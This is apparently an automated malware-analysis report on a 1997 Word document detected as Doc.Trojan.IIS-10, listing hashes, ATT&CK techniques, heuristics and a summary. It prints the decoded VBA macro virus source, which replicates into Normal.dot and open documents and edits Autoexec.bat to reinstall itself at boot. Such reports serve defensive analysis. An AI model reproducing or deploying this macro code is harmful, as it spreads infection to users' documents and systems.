Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0f0cf33221961773…

MALICIOUS

Office (OLE)

Size: 63.0 KB
Created: 1997-09-17 11:18:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: d46b6af12c59b3d905edfdf0683d7220
SHA-1: 0733004c44feaf69d27986c095fa171c8ff45455
SHA-256: 0f0cf332219617731416d07c41b0edf16e07d4d396482f7e653f5324bce376d4
Risk Score: 180

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The file contains VBA macros, specifically a Document_Open macro, a common initial-execution technique in malicious documents because it runs automatically when the document is opened. The macro exports the first VBA component of the Normal template and of the active document to c:\vn.dll and c:\vd.dll, rebuilds its own Document_Open body from whichever copy is not yet infected, and writes that body back into Normal.dot (or, when Normal.dot is read-only, into C:\Normalb.dot together with Autoexec.bat entries that copy it over Normal.dot at the next boot) and into the active document. The Autoexec.bat manipulation suggests a mechanism intended to stage and execute a second-stage payload, although the visible preview contains no network or download code and what it shows is classic macro-virus self-replication. The ClamAV detection as 'Doc.Trojan.IIS-10' further supports its malicious nature.

Heuristics (3)

  • ClamAV: Doc.Trojan.IIS-10 (severity: critical, rule CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.IIS-10
  • VBA macros detected (severity: medium, rule OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • Document_Open macro (severity: high, rule OLE_VBA_DOCOPEN)
    Document contains a Document_Open macro, which executes automatically when the document is opened

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 77686 bytes
SHA-256: 051e4d4cfaf71abeff696368f2cb2805a691dbcab2b5eae1e3834fc769eb4a88
Detection: ClamAV: Doc.Trojan.IIS-10
Obfuscation or payload: unlikely

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Rem MyName = IIS
Close
On Error GoTo MegaJump
    Set prevDocument = NormalTemplate
    Set nextDocument = newDocument
Line Input #1, ms
If UCase(Left(ms, 7)) = "WINDIR=" Then
a = Len(ms)
windir = Mid(ms, 8, a)
GoTo fert
End If
Close
fert:
Close
Open windir & "\system\Log.drv" For Append As #1
Print #1, "+"
Close
NormInstalled = False
ActInstalled = False
NormalTemplate.VBProject.VBComponents(1).Export ("c:\vn.dll")
ActiveDocument.VBProject.VBComponents(1).Export ("c:\vd.dll")
NormInst = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(2, 1)
ActInst = ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(2, 1)
If UCase(NormInst) = "REM MYNAME = IIS" Then NormInstalled = True
If UCase(ActInst) = "REM MYNAME = IIS" Then ActInstalled = True

Close
Open "c:\Autoexec.bat" For Append As #12
Close #12
Open "c:\Autoexec.bat" For Input As #12
Do Until EOF(12)
If EOF(12) Then GoTo dss
Line Input #12, a
If a = "@del c:\normalb.dot" Then SetAttr (NormalTemplate.FullName), vbReadOnly
Loop
dss:

If NormInstalled = True And ActIntalled = True Then GoTo esub
If NormInstalled = True Then IW = "C:\vn.dll" Else IW = "C:\Vd.dll"
Open IW For Input As #1
FullCode = "Private Sub Document_Open()" & Chr(13)
Do
Line Input #1, VirCode
Loop Until VirCode = "Private Sub Document_Open()"
Do
If VirCode = "End Sub" Then ess = ess + 1
If ess = 3 Then GoTo jump
Line Input #1, VirCode
If VirCode = "Rem Written by Flitnic" Then GoTo jump
FullCode = FullCode & VirCode & Chr(13)
Loop
jump:
FullCode = FullCode & VirCode & Chr(13)
FullCode = FullCode & "End Sub"
If NormInstalled = False Then
dd = Dir(NormalTemplate.FullName)
If dd = "" Then GoTo AtrNo
at = GetAttr(NormalTemplate.FullName)
If at = 33 Then at = 1
If at = 1 Then
Close
Open "c:\Autoexec.bat" For Append As #12
Close #12
Open "c:\Autoexec.bat" For Input As #12
Do Until EOF(12)
If EOF(12) Then GoTo ds
Line Input #12, a
If a = "@del c:\normalb.dot" Then GoTo fv
Loop
ds:
SetAttr (NormalTemplate.FullName), vbNormal
Documents.Add Template:="", NewTemplate:=False
Lines = ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines
ActiveDocument.VBProject.VBComponents(1).CodeModule.DeleteLines 1, Lines
ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines 1, FullCode
ActiveDocument.SaveAs FileName:="C:\Normalb.dot", FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False
ActiveDocument.Save
Close #1
Open "c:\No.dat" For Append As #1
Close #1
ActiveDocument.Close
Kill "c:\No.dat"
Close #12
Open "c:\autoexec.bat" For Append As #12
Close #12

FileCopy "c:\Autoexec.bat", "c:\Autoexec.bak"
Close #12
Open "c:\Autoexec.bat" For Append As #12
Print #12, "@Copy /y C:\normalb.dot " & NormalTemplate.FullName
Print #12, "@del c:\normalb.dot"
Print #12, "@Copy /y c:\Autoexec.bak c:\Autoexec.bat"
fv:
Close
Exit Sub
End If
AtrNo:
Lines = NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines
NormalTemplate.VBProject.VBComponents(1).CodeModule.DeleteLines 1, Lines
NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines 1, FullCode
dd = Dir(NormalTemplate.FullName)
If dd = "" Then Exit Sub
NormalTemplate.Save
End If
If ActInstalled = False Then
If Mid(ActiveDocument.FullName, 3, 1) = "\" Then
Lines = ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines
ActiveDocument.VBProject.VBComponents(1).CodeModule.DeleteLines 1, Lines
ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines 1, FullCode
ActiveDocument.Save
Else
Lines = ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines
ActiveDocument.VBProject.VBComponents(1).CodeModule.DeleteLines 1, Lines
ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines 1, FullCode
End If
End If
e
... (truncated)